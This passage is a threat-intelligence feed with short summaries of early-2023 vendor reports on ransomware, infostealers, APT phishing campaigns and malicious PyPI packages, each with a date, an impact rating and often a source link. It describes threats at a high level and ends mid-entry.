- Hackers_Leveraging_HTML_Smuggling_to_Deliver_Malware
- Date of Scan:
- 2023-02-10
- Impact:
- LOW
- Summary:
- SpiderLabs researchers have analyzed some notable malware strains that have utilized HTML smuggling in their infection chain and provide a brief analysis of each malware.
—
- Intel Source:
- Sonatypa
- Intel Name:
- Malicious_aptX_Python_Package_Drops_Meterpreter_Shell
- Date of Scan:
- 2023-02-09
- Impact:
- LOW
- Summary:
- Researchers from Sonatype have identified malicious Python packages on the PyPI software registry that carry out a bunch of nefarious activities.
Source:
https://blog.sonatype.com/malicious-aptx-python-package-drops-meterpreter-shell-deletes-netstat
—
- Intel Source:
- ASEC
- Intel Name:
- The_distribution_of_Quasar_RAT
- Date of Scan:
- 2023-02-09
- Impact:
- LOW
- Summary:
- The ASEC analysis team just discovered the Quasar RAT malware through the private Home Trading System (HTS). It is assumed that the victims did not install their HTS from an institutional financial company, but instead, they got HPlus HTS through an unsanctioned source or a disguised financial investment company. The malware, Quasar, is a RAT malware that allows threat actors to gain control over infected systems to either steal information or perform malicious behaviors.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_Backdoor_with_Smart_Screenshot_Capability
- Date of Scan:
- 2023-02-09
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified that backdoors and trojans implemented screenshot capabilities to “see” what’s displayed on the victim’s computer and to take a screenshot in Python.
—
- Intel Source:
- Cybereason
- Intel Name:
- GootLoader_Leveraging_SEO_Poisoning_Techniques
- Date of Scan:
- 2023-02-09
- Impact:
- LOW
- Summary:
- Cybereason researchers have investigated an incident that involved new deployment methods of the GootLoader malware loader through heavily-obfuscated JavaScript files.
—
- Intel Source:
- Blackberry
- Intel Name:
- Hackers_From_NewsPenguin_Targeting_Pakistani_Entities
- Date of Scan:
- 2023-02-09
- Impact:
- LOW
- Summary:
- BlackBerry researchers have identified an unknown threat actor dubbed NewsPenguin has been linked to a phishing campaign targeting Pakistani entities by leveraging the upcoming international maritime expo as a lure.
—
- Intel Source:
- NTT Security
- Intel Name:
- The_malware_attacks_distributed_by_SteelClove_group
- Date of Scan:
- 2023-02-09
- Impact:
- LOW
- Summary:
- NTT Security SOC team shared the latest tactics in attacks by SteelClover among the most recently observed cases of malware distribution via Google Ads. SteelClover is an attack group that has been active since 2019, and their purpose is money.
Source:
https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle
—
- Intel Source:
- SecuInfra
- Intel Name:
- Analysis_of_ESXiArgs_Ransomware
- Date of Scan:
- 2023-02-09
- Impact:
- LOW
- Summary:
- In their post SecuInfrs analysts are analyzing the recent “ESXiArgs” Ransomware variant, which spread to a large number of outdated, internet-exposed ESXi Servers around the world.
Source:
https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/
—
- Intel Source:
- Symantec
- Intel Name:
- New_Russian_Information_Stealing_Malware_Graphiron
- Date of Scan:
- 2023-02-09
- Impact:
- MEDIUM
- Summary:
- A new russian Nodaria group has installed a new malware threat that targets to steal a wide range of information from infected computers. The Nodaria espionage group (aka UAC-0056) is using a new piece of information stealing malware against targets in Ukraine. The malware (Infostealer.Graphiron) is written in Go language and is meant to collect a wide range of information from the infected computer, including system information, credentials, screenshots, and files.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_samples_January_30th_to_February_5th_2023
- Date of Scan:
- 2023-02-08
- Impact:
- LOW
- Summary:
- The ASEC analysis team keeps monitoring a weekly malware collection samples for January 30 – February 5th, 2023. The top malwares for this week is SmokeLoader, BeamWinHTTP, Formbook, Quasar RAT and Redline.
—
- Intel Source:
- Sentinelone
- Intel Name:
- Cl0p_Ransomware_Targets_Linux_Systems
- Date of Scan:
- 2023-02-08
- Impact:
- LOW
- Summary:
- Researchers from SentinelOne have observed the first ELF variant of Cl0p (also known as Clop) ransomware variant targeting Linux systems. The new variant is similar to the Windows variant, using the same encryption method and similar process logic.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Newly_Threat_Actor_TA866_Distributing_Malware_via_Email
- Date of Scan:
- 2023-02-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Proofpoint have observed a cluster of evolving financially motivated activity which they are referring to as “Screentime”. The attack chain starts with an email containing a malicious attachment or URL and leads to malware that Proofpoint dubbed WasabiSeed and Screenshotter.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Zhulong_Threat_Group_Targeting_Vietnam_Telecom_and_Media_Sector
- Date of Scan:
- 2023-02-08
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have discovered a new hacking group that is targeting Vietnam’s telecom, technology, and media sectors. The group is dubbed as Earth Zhulong and it is related to the Chinese-linked hacking group 1937CN based on similar code in the custom shellcode loader and victimology.
Source:
https://www.trendmicro.com/en_us/research/23/b/earth-zhulong-familiar-patterns-target-vietnam.html
—
- Intel Source:
- Cyble
- Intel Name:
- Ransomware_Attacks_Targeting_VMware_ESXi_Servers
- Date of Scan:
- 2023-02-08
- Impact:
- LOW
- Summary:
- Cyble researchers have identified a ransomware attack targeting VMware ESXi servers to deploy ESXi Args Ransomware.
Source:
https://blog.cyble.com/2023/02/06/massive-ransomware-attack-targets-vmware-esxi-servers/
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_Distributing_Again_in_Korea
- Date of Scan:
- 2023-02-08
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the redistribution of Magniber disguised as normal Windows Installers (MSI). The distributed Magniber files have MSI as their extensions, disguising themselves as Windows update files.
—
- Intel Source:
- Equinix Threat Analysis Center
- Intel Name:
- Royal_Ransomware_Targeting_VMware_ESXi_Servers_in_Linux_Devices
- Date of Scan:
- 2023-02-08
- Impact:
- LOW
- Summary:
- Researchers from Equinix Threat Analysis Center (ETAC) have identified that Royal ransomware updating techniques for encrypting Linux devices and specially targeting VMware ESXi virtual machines.
Source:
https://twitter.com/BushidoToken/status/1621087221905514496
—
- Intel Source:
- CERT-UA
- Intel Name:
- Hackers_Targeting_State_Bodies_of_Ukraine
- Date of Scan:
- 2023-02-08
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified mass distribution of e-mails and an attachment in the form of RAR- archive “court letter, information on debt.rar.”
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Trigona_ransomware_variant
- Date of Scan:
- 2023-02-07
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs got together the report for the Trigona ransomware with the details and insights of this ransomware landscape protection against those variants.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-trigona-ransomware
—
- Intel Source:
- Diff Report
- Intel Name:
- Observed_intrusion_used_AutoHotkey_to_launch_a_keylogger
- Date of Scan:
- 2023-02-07
- Impact:
- LOW
- Summary:
- The Diff team observed a compromise that used with a Word document containing a malicious VBA macro, which established persistence and communication to a command and control server (C2). During the initial discovery and user enumeration, the threat actor used AutoHotkey to launch a keylogger.
Source:
https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/
—
- Intel Source:
- Cyble
- Intel Name:
- New_Medusa_Botnet_targeting_Linux_Users
- Date of Scan:
- 2023-02-07
- Impact:
- MEDIUM
- Summary:
- Cyble Research and Intelligence Labs has been monitoring on the actions of the MiraiBot and its behavior. A botnet capable of Performing DDoS, Ransomware, and Bruteforce Attacks.
Source:
https://blog.cyble.com/2023/02/03/new-medusa-botnet-emerging-via-mirai-botnet-targeting-linux-users/
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Trickbot_Malware
- Date of Scan:
- 2023-02-07
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of Trickbot Malware. It is operating since 2016. It is primarily distributed through phishing campaigns and is known for its ability to steal sensitive information such as login credentials, financial information, and personal data.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-trickbot-malware-active-iocs-30
—
- Intel Source:
- ASEC
- Intel Name:
- The_cases_of_threat_actors_using_Sliver_malware
- Date of Scan:
- 2023-02-07
- Impact:
- LOW
- Summary:
- This ASEC blog is desctibing recent cases of threat actors using Sliver in addition to Cobalt Strike and Metasploit. The ASEC (AhnLab Security Emergency response Center) analysis team keeps eye on the attacks against systems with either unpatched vulnerabilities or misconfigured settings. A recently discovered a Sliver backdoor being installed through what is presumed to be vulnerability exploitation on certain software.
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_backdoor_Windows_Devices_in_Sliver_and_BYOVD_Attacks
- Date of Scan:
- 2023-02-07
- Impact:
- LOW
- Summary:
- ASEC researchers have identified a new hacking campaign that exploits Sunlogin flaws to deploy the Sliver post-exploitation toolkit and launch Windows Bring Your Own Vulnerable Driver (BYOVD) attacks to disable security software.
—
- Intel Source:
- Zscaler
- Intel Name:
- Analysis_of_the_AveMaria_infostealer_attack_chain
- Date of Scan:
- 2023-02-07
- Impact:
- LOW
- Summary:
- Zscaler’s ThreatLabz research team monitors and tracks very close active threat campaigns. In their report they provided the seven case studies that follow provide an in-depth analysis of the AveMaria infostealer attack chain and how it has been shifting over the past six months.
—
- Intel Source:
- Security Joes
- Intel Name:
- The_Gambling_Industry_is_targeted_by_Ice_Breaker_Operation
- Date of Scan:
- 2023-02-06
- Impact:
- LOW
- Summary:
- In September of last year, Security Joes IRT was informed about an incident with an attempt of social engineering an online customer service platform. Due to custom-built rules and extensive employee awareness training, Security Joes IRT was able to push back these threats. Recently they tracked a new threat actor as Ice Breaker APT. Although research is still ongoing, the team is sharing this article to reveal the attacker’s Modus Operandi, attack chain, ways to mitigate the threat and supported IOCs, TTPs and Yara.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_samples_January_23_29th_2023
- Date of Scan:
- 2023-02-06
- Impact:
- LOW
- Summary:
- The ASEC analysis team keep monitoring weekly malware collection samples for January 23-29th, 2023. The top malwares for this week is SmokeLoader, BeamWinHTTP, Formbook, AgentTesla and SnakeKeylogger.
—
- Intel Source:
- Deep Instinct
- Intel Name:
- Hackers_Leveraging_Microsoft_Visual_Studio_Add_Ins_to_Push_Malware
- Date of Scan:
- 2023-02-06
- Impact:
- LOW
- Summary:
- Deep Instinct researchers have observed that hackers start using Microsoft Visual Studio Tools for Office (VSTO) more often as method to achieve persistence and execute code on a target machine via malicious Office add-ins.
Source:
https://www.deepinstinct.com/blog/no-macro-no-worries-vsto-being-weaponized-by-threat-actors
—
- Intel Source:
- Fortinet
- Intel Name:
- Supply_Chain_Attack_by_New_Malicious_Python_Package_web3_essential
- Date of Scan:
- 2023-02-06
- Impact:
- MEDIUM
- Summary:
- FortiGate researchers have discovered another new 0-day attack in a PyPI package (Python Package Index) called web3-essential. The package includes malicious code in its setup.py installation script that downloads and runs an executable file as a part of its installation.
—
- Intel Source:
- Quickheal
- Intel Name:
- The_Details_Examination_of_Malware_Technique
- Date of Scan:
- 2023-02-05
- Impact:
- LOW
- Summary:
- QuickHeal researchers have observed crucial steps in the attack chain, like, how is the malware able to achieve administrative privileges to perform changes in the system.
—
- Intel Source:
- Cyble
- Intel Name:
- New_BATLoader_Spreading_RATs_and_Stealers
- Date of Scan:
- 2023-02-05
- Impact:
- LOW
- Summary:
- Cyble researchers have observed a novel type of BAT loader is used to distribute a range of RAT and Stealer malware families. This loader employs an innovative method to deliver the malicious payload to the user system.
Source:
https://blog.cyble.com/2023/02/02/new-batloader-disseminates-rats-and-stealers/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Mustang_Panda_APT_Group_Targeting_Europe_With_Spearphishing_Campaign
- Date of Scan:
- 2023-02-04
- Impact:
- LOW
- Summary:
- EclecticIQ researchers have identified that the Mustang Panda APT group started targeting Europe with a new spearphishing campaign using a customized variant of the PlugX backdoor.
—
- Intel Source:
- Cyble
- Intel Name:
- Qakbot_Rising_with_New_Strategies
- Date of Scan:
- 2023-02-04
- Impact:
- LOW
- Summary:
- Cyble researchers have identified that threat actors leveraging Microsoft OneNote to infect users.
Source:
https://blog.cyble.com/2023/02/01/qakbots-evolution-continues-with-new-strategies/
—
- Intel Source:
- Sentinelone
- Intel Name:
- DotNET_Malware_Loaders_aka_MalVirt_Distributing_Through_Malvertising_Attack
- Date of Scan:
- 2023-02-04
- Impact:
- LOW
- Summary:
- SentinelOne researchers have observed a cluster of virtualized .NET malware loaders distributing through malvertising attacks and the loader dubbed MalVirt, uses obfuscated virtualization for anti-analysis and evasion along with the Windows Process Explorer driver for terminating processes.
Source:
https://www.sentinelone.com/labs/malvirt-net-virtualization-thrives-in-malvertising-attacks/
—
- Intel Source:
- WithSecure
- Intel Name:
- Hackers_From_Korea_Exploiting_Unpatched_Zimbra_Devices
- Date of Scan:
- 2023-02-04
- Impact:
- LOW
- Summary:
- Researchers from WithSecurity have identified a new intelligence-gathering campaign linked to the prolific North Korean state-sponsored Lazarus Group leveraged known security flaws in unpatched Zimbra devices to compromise victim systems.
—
- Intel Source:
- ASEC
- Intel Name:
- Malicious_LNK_File_Disguising_as_a_Normal_HWP_Document
- Date of Scan:
- 2023-02-03
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the distribution of a malicious LNK file disguised as a normal HWP document, Along with a text file impersonating the National Tax Service.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Hackers_From_APT34_Targeting_The_Middle_East
- Date of Scan:
- 2023-02-03
- Impact:
- LOW
- Summary:
- TrendMicro researchers have identified a suspicious executable that was dropped and executed on multiple machines. Upon investigation, It is inked with APT34, and the main goal is to steal users’ credentials. Even in case of a password reset or change, the malware is capable of sending the new credentials to the threat actors.
Source:
https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html
—
- Intel Source:
- Aqua Blog
- Intel Name:
- HeadCrab_Malware_Compromising_Redis_Servers
- Date of Scan:
- 2023-02-03
- Impact:
- LOW
- Summary:
- Aqua security researchers have identified that around 1,200 Redis database servers worldwide have been corralled into a botnet using an elusive and severe threat dubbed HeadCrab since early September 2021.
Source:
https://blog.aquasec.com/headcrab-attacks-servers-worldwide-with-novel-state-of-art-redis-malware
—
- Intel Source:
- ASEC
- Intel Name:
- CoinMiners_Mining_Ethereum_Classic_Coins_attack_cases
- Date of Scan:
- 2023-02-02
- Impact:
- LOW
- Summary:
- The ASEC analysis team is observing CoinMiners that are targeting Korean and overseas users. The ASEC analysis team studied cases of various types of CoinMiner attacks over multiple blog posts in the past. They shared information to introduce the recently discovered malware that mine Ethereum Classic coins.
—
- Intel Source:
- CERT-UA
- Intel Name:
- The_Ministry_of_Foreign_Affairs_official_of_Ukraine_Web_Resource_Imitated
- Date of Scan:
- 2023-02-02
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have discovered a web page imitating the official web resource of the Ministry of Foreign Affairs of Ukraine, which offers to download software for the detection of infected computers.
—
- Intel Source:
- Cyble
- Intel Name:
- Remote_Desktop_Files_targeted_by_evasive_malware
- Date of Scan:
- 2023-02-02
- Impact:
- MEDIUM
- Summary:
- Cyble Research and Intelligence Labs (CRIL) discovered a new malware named ‘Vector Stealer’, which can steal .rdp files. By stealing these RDP files it can enableThreat Actors to do RDP hijacking as these files have details about the RDP session, including information needed for remote access.
Source:
https://blog.cyble.com/2023/02/01/vector-stealer-a-gateway-for-rdp-hijacking/
—
- Intel Source:
- Checkmarx
- Intel Name:
- The_track_of_tactics_of_the_threat_actor_PYTA27
- Date of Scan:
- 2023-02-02
- Impact:
- LOW
- Summary:
- The Checkmarx threat reserachers analyzed In this blog the tactics of one attacker who has been distributing their packages for at least four months and shows no signs of stopping. This actor is tracked as PYTA27.
Source:
https://checkmarx.com/blog/evolution-of-a-software-supply-chain-attacker/
—
- Intel Source:
- Rapid7
- Intel Name:
- The_spread_of_Redline_Infostealer_Malware
- Date of Scan:
- 2023-02-02
- Impact:
- MEDIUM
- Summary:
- Recently, Rapid7 discovered the activity of malicious actors using OneNote files to deliver malicious code. Rapid 7 found a specific technique that used OneNote files containing batch scripts, which upon execution started an instance of a renamed PowerShell process to decrypt and execute a base64 encoded binary.
—
- Intel Source:
- PRODAFT
- Intel Name:
- Active_IOCs_of_LockBit_Green
- Date of Scan:
- 2023-02-02
- Impact:
- MEDIUM
- Summary:
- Researchers from Prodaft have identified that the LockBit ransomware team made a so-called “LockBit Green” version of their ransomware available.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Microsoft_OneNote_Documents_Delivering_Malware_via_Email
- Date of Scan:
- 2023-02-02
- Impact:
- MEDIUM
- Summary:
- Proofpoint researchers have identified an increase in threat actor use of OneNote documents to deliver malware via email to unsuspecting end-users in December 2022 and January 2023.
—
- Intel Source:
- PaloAlto
- Intel Name:
- GuLoader_Encrypted_With_NSIS_Crypter
- Date of Scan:
- 2023-02-02
- Impact:
- LOW
- Summary:
- In their post post, the Unit 42 researchers discussed a machine learning pipeline and analyses of one GuLoader downloader that has been encrypted with an Nullsoft Scriptable Install System (NSIS) crypter. NSIS is an open source system to create Windows installers.
Source:
https://unit42.paloaltonetworks.com/malware-detection-accuracy/
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Analysis_of_Cryptojacks_System_to_Mine_for_Monero_Crypto
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- Fortinet researchers have analyzed the crypto miner software that is delivering via the Excel document and executing it on the victim device.
—
- Intel Source:
- ASEC
- Intel Name:
- An_Email_Specific_Phishing_Page
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- ASEC researchers have identified multiple phishing emails that are distributed with a changing icon to reflect the mail account service entered by the user and send a warning that their account will be shut down, prompting them to click the ‘Reactivate Now’ link if they need their account kept active.
—
- Intel Source:
- Secureworks
- Intel Name:
- The_Similarities_Between_Abraham_s_Ax_and_Moses_Staff_Group
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- Researchers from SecureWorks have analyzed the similarities between the Moses Staff hacktivist group persona that emerged in September 2021 and the Abraham’s Ax persona that emerged in November 2022.
Source:
https://www.secureworks.com/blog/abrahams-ax-likely-linked-to-moses-staff
—
- Intel Source:
- ASEC
- Intel Name:
- TZW_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the distribution of the TZW ransomware, which encrypts files before adding the “TZW” file extension to the original extension.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Malware_Packer_TrickGate_Using_by_Several_Malware_to_Evade_Detection
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- Researchers from Checkpoint have identified a shellcode-based packer dubbed TrickGate has been successfully operating without attracting notice for over six years, while enabling threat actors to deploy a wide range of malware such as TrickBot, Emotet, AZORult, Agent Tesla, FormBook, Cerber, Maze, and REvil over the years.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- NikoWiper_Malware_Targeting_Ukraine_Energy_Sector
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- ESET researchers have analyzed the activities of selected APT groups and identified the Russia-affiliated Sandworm using another wiper malware strain dubbed NikoWiper as part of an attack that took place in October 2022 targeting an energy sector company in Ukraine.
Source:
https://www.welivesecurity.com/wp-content/uploads/2023/01/eset_apt_activity_report_t32022.pdf
—
- Intel Source:
- Esentire
- Intel Name:
- Changes_in_the_IcedID_malware_strategy
- Date of Scan:
- 2023-02-01
- Impact:
- MEDIUM
- Summary:
- Last December 2022, Esentire threat intel team observed IcedID infections that were traced to payloads downloaded by users from the Internet. This observation matched with a general uptick in successful IcedID infections in Q4 of 2022, which saw 35% percent of IcedID incidents for the period between January 2022 and January 2023. The observed IcedID infections have originated exclusively via drive-by attacks, specifically Google Search Ads targeting common applications.
Source:
https://www.esentire.com/blog/icedid-malware-shifts-its-delivery-strategy
—
- Intel Source:
- Quickheal
- Intel Name:
- LockBit_s_new_Black_variant_attack
- Date of Scan:
- 2023-02-01
- Impact:
- MEDIUM
- Summary:
- The Quickheak team investigated and analyzed about the LockBit’s new Black variant attack. They have determined that the new LockBit 3.0 variant has a high infection vector and attack chain exhibiting substantial anti-forensic activity. This variant showed that is capable of clearing the event logs, killing multiple tasks, and deleting services simultaneously. It also can obtain initial access to the victim’s network via SMB brute forcing from various IPs.
Source:
https://blogs.quickheal.com/uncovering-lockbit-blacks-attack-chain-and-anti-forensic-activity/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Google_Ads_Targeting_Password_Manager
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- Researchers from Malwarebytes have identified a new malvertising campaign that makes use of Google Ads to target users looking for password managers.
—
- Intel Source:
- Resecurity
- Intel Name:
- New_Version_of_Nevada_Ransomware
- Date of Scan:
- 2023-02-01
- Impact:
- MEDIUM
- Summary:
- Resecurity researchers have identified a new version of Nevada Ransomware which recently emerged on the Dark Web right before the start of 2023. The actors behind this new project have an affiliate platform first introduced on the RAMP underground community, which is known for initial access brokers (IABs) and other cybercriminal actors and ransomware groups.
Source:
https://resecurity.com/blog/article/nevada-ransomware-waiting-for-the-next-dark-web-jackpot
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_Emails_Circulating_With_Requests_for_Product_Quotation
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified phishing emails with content related to requests for product quotations. These phishing emails are all disguised to seem as if they were sent by a manager with a high position, such as the team leader or department director of production companies or foundries, and were also .html and .htm attachments.
—
- Intel Source:
- Inky
- Intel Name:
- An_ongoing_phishing_campaign_that_impersonates_Southwest_Airlines
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- Last December, INKY observed and detected an ongoing phishing campaign that impersonates Southwest Airlines. Phishing emails are being sent from newly created domains, set up explicitly for these attacks.
Source:
https://www.inky.com/en/blog/fresh-phish-southwests-flying-phish-takes-off-with-your-credentials
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_samples_January_16_22nd_2023
- Date of Scan:
- 2023-01-31
- Impact:
- LOW
- Summary:
- The ASEC analysis team keep monitoring weekly malware collection samples for January 16-22nd, 2023. They shared their analyses of the cases of distribution of phishing emails during this week and provide statistical information on each type.
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Magniber_ransomware_spotlight
- Date of Scan:
- 2023-01-31
- Impact:
- MEDIUM
- Summary:
- After it was originally discovered in 2017, Magniber came back in 2021. It is aiming some Asian countries and TrendMicro found out about the exploitation of new vulnerabilities for initial access, including CVE-2021-26411, CVE-2021-40444, and most notably the PrintNightmare vulnerability, CVE-2021-34527
Source:
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-magniber
—
- Intel Source:
- Recorded Future
- Intel Name:
- Hackers_From_BlueBravo_Deploying_GraphicalNeutrino_Malware
- Date of Scan:
- 2023-01-31
- Impact:
- LOW
- Summary:
- Recorded Future researchers have identified the new malware used by BlueBravo threat group, which overlaps with Russian APT activity tracked as APT29 and NOBELIUM, which Western governments and researchers have linked to the Russian Foreign Intelligence Service (SVR).
Source:
https://www.recordedfuture.com/bluebravo-uses-ambassador-lure-deploy-graphicalneutrino-malware
—
- Intel Source:
- Sucuri
- Intel Name:
- Database_Injection_Attacks_Compromise_WordPress_Sites
- Date of Scan:
- 2023-01-30
- Impact:
- LOW
- Summary:
- Sucuri researchers have identified a massive campaign that infects over 4,500 WordPress websites as part of a long-running operation. According to GoDaddy-owned Sucuri, the infections involve the injection of obfuscated JavaScript hosted on a malicious domain that’s designed to redirect visitors to undesirable sites.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Hackers_From_Sandworm_Group_Targeting_News_Agencies
- Date of Scan:
- 2023-01-30
- Impact:
- LOW
- Summary:
- Researchers from CERT-UA have identified the five different data-wiping malware strains deploying on the network of the country’s national news agency (Ukrinform) on January 17th.
—
- Intel Source:
- Mandiant
- Intel Name:
- Gootkit_Malware_Updating_With_New_Components_and_Obfuscations
- Date of Scan:
- 2023-01-30
- Impact:
- LOW
- Summary:
- Mandiant researchers have identified that the threat actors associated with the Gootkit malware have made notable changes to their toolset, adding new components and obfuscations to their infection chains.
Source:
https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations
—
- Intel Source:
- Esentire
- Intel Name:
- The_Deep_Examination_of_Venom_Spider
- Date of Scan:
- 2023-01-30
- Impact:
- LOW
- Summary:
- Esentire researchers have discovered the real-world identity of the threat actor behind Golden Chickens malware-as-a-service, who goes by the online persona badbullzvenom.
Source:
https://www.esentire.com/web-native-pages/unmasking-venom-spider
—
- Intel Source:
- PaloAlto
- Intel Name:
- Realtek_SDK_Vulnerability_Attempting_to_Hack_IoT_Devices
- Date of Scan:
- 2023-01-30
- Impact:
- LOW
- Summary:
- Researchers from PaloAlto have observed the spike in exploitation attempts weaponizing a critical remote code execution flaw in Realtek Jungle SDK, the ongoing campaign is said to have recorded 134 million exploit attempts as of December 2022, with 97% of the attacks occurring in the past four months.
Source:
https://unit42.paloaltonetworks.com/realtek-sdk-vulnerability/#post-126726-_f37quwequ6r
—
- Intel Source:
- ESET
- Intel Name:
- Sandworm_APT_Targeting_Ukraine
- Date of Scan:
- 2023-01-30
- Impact:
- LOW
- Summary:
- ESET researchers have discovered a new Golang-based wiper, dubbed SwiftSlicer, that is used in attacks aimed at Ukraine. Also, they believe that the Russia-linked APT group Sandwork (aka BlackEnergy and TeleBots) is behind the wiper attacks.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_samples_January_8_14th_2023
- Date of Scan:
- 2023-01-28
- Impact:
- LOW
- Summary:
- The ASEC analysis team keep monitoring weekly malware collection samples for January 8-14th, 2023. They shared their analyses of thee cases of distribution of phishing emails during this week and provide statistical information on each type.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Mimic_Ransomware_Targeting_Russian_and_English_Speaking_Users
- Date of Scan:
- 2023-01-27
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have discovered a new ransomware that abuses the APIs of a legitimate tool called Everything, a Windows filename search engine developed by Voidtools that offers quick searching and real-time updates for minimal resource usage.
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- Kronos_Malware_Increasing_its_Functionality
- Date of Scan:
- 2023-01-27
- Impact:
- LOW
- Summary:
- Researchers from IBM Security Intelligence have identified that Kronos Malware is back with new functionality. It is typically used to download other malware and has historically been used by threat actors to deliver different types of malware to victims.
—
- Intel Source:
- Cyble
- Intel Name:
- Titan_Stealer_Leveraging_GoLang
- Date of Scan:
- 2023-01-27
- Impact:
- LOW
- Summary:
- Cyble researchers have observed that threat actors use Golang for their information stealer malware. Additionally, it is spotted, Titan stealer using multiple Command and Control (C&C) infrastructures targeting new victims.
Source:
https://blog.cyble.com/2023/01/25/titan-stealer-the-growing-use-of-golang-among-threat-actors/
—
- Intel Source:
- Zscaler
- Intel Name:
- Hackers_Targeting_Tech_Layoff_Employees_With_Job_Scams
- Date of Scan:
- 2023-01-27
- Impact:
- MEDIUM
- Summary:
- Zscaler Threatlabz researchers have observed multiple suspicious job portals and surveys used by attackers to solicit information from job seekers under the guise of employment application forms. The attackers may advertise jobs online, sometimes setting up fake websites, or look for targets on social media to steal money and personal information.
—
- Intel Source:
- CISA
- Intel Name:
- Cybercriminals_Leveraging_Legitimate_RMM_software
- Date of Scan:
- 2023-01-27
- Impact:
- MEDIUM
- Summary:
- CISA researchers have identified a widespread cyber campaign involving the malicious use of legitimate RMM software. Specifically, cyber-criminal actors send phishing emails to the target to download legitimate RMM software—ScreenConnect (now ConnectWise Control) and AnyDesk—which the actors use in a refund scam to steal money from victim bank accounts.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Chinese_PlugX_Malware_Hidden_in_USB_Devices
- Date of Scan:
- 2023-01-27
- Impact:
- MEDIUM
- Summary:
- Researchers from PaloAlto have discovered a similar variant of PlugX in VirusTotal that infects USB devices and copies all Adobe PDF and Microsoft Word files from the host. It places these copies in a hidden folder on the USB device that is created by the malware.
Source:
https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/
—
- Intel Source:
- Trellix
- Intel Name:
- The_Deep_Examination_of_GuLoader
- Date of Scan:
- 2023-01-27
- Impact:
- LOW
- Summary:
- Trellix researchers have analyzed the multiple archive types used by threat actors to trick users into opening an email attachment and the progression of its distribution inside NSIS (Nullsoft Scriptable Install System) executable files by showing the obfuscation and string encryption updates through the year 2022.
Source:
https://www.trellix.com/en-us/about/newsroom/stories/research/guloader-the-nsis-vantage-point.html
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Raccoon_Infostealer
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Raccoon Infostealer. It gathers private data such as credit card numbers, cryptocurrency wallet addresses, login passwords, and browser information like cookies and history.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-raccoon-infostealer-active-iocs-39
—
- Intel Source:
- Cyble
- Intel Name:
- The_rised_concern_of_Amadey_Bot
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- Recently, Cyble Research and Intelligence Labs (CRIL) has observed a huge spike of Amadey bot samples. It proved that threat actors are actively using this bot to infect victims’ systems with another malware.
Source:
https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/
—
- Intel Source:
- Proofpoint
- Intel Name:
- North_Korean_Hackers_Moving_With_Credential_Harvesting
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- Researchers from Proofpoint have identified a well known North Korean threat group for crypto heists has been attributed to a new wave of malicious email attacks as part of a “sprawling” credential harvesting activity targeting a number of industry verticals, marking a significant shift in its strategy.
Source:
https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds
—
- Intel Source:
- Huntress
- Intel Name:
- The_ConnectWise_Control_vulnerabilities_and_exploitation
